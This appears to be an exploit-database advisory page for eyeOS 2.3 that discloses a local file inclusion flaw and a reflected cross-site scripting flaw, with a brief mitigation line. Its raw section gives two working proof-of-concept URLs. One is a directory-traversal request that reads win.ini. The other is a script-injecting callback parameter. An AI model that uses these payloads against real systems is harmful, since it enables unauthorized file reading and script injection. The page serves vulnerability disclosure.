header-logo
Suggest Exploit
vendor:
eyeOS
by:
AutoSec Tools
3.3
CVSS
LOW
Local File Inclusion and Reflected Cross-site Scripting
22, 79
CWE
Product Name: eyeOS
Affected Version From: 2.3
Affected Version To: 2.3
Patch Exists: YES
Related CWE: N/A
CPE: a:eyeos:eyeos:2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista + XAMPP
2011

eyeOS 2.3 Local File Inclusion and Reflected Cross-site Scripting Vulnerabilities

A local file inclusion vulnerability in eyeOS 2.3 can be exploited to include arbitrary files. A reflected cross-site scripting vulnerability in eyeOS 2.3 can be exploited to execute arbitrary JavaScript.

Mitigation:

Ensure that user-supplied input is properly validated and sanitized before being used in the application.
Source

Exploit-DB raw data:

------------------------------------------------------------------------
Software................eyeOS 2.3
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.eyeos.org/
Discovery Date..........4/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A local file inclusion vulnerability in eyeOS 2.3 can be exploited to
include arbitrary files.


--PoC--

http://localhost/eyeos/devtools/qooxdoo-sdk/framework/source/resource/qx/test/part/delay.php?sleep=0&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini

------------------------------------------------------------------------
Software................eyeOS 2.3
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://www.eyeos.org/
Discovery Date..........4/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in eyeOS 2.3 can be
exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/eyeos/devtools/qooxdoo-sdk/framework/source/resource/qx/test/jsonp_primitive.php?callback=%3Cscript%3Ealert%280%29%3C%2fscript%3E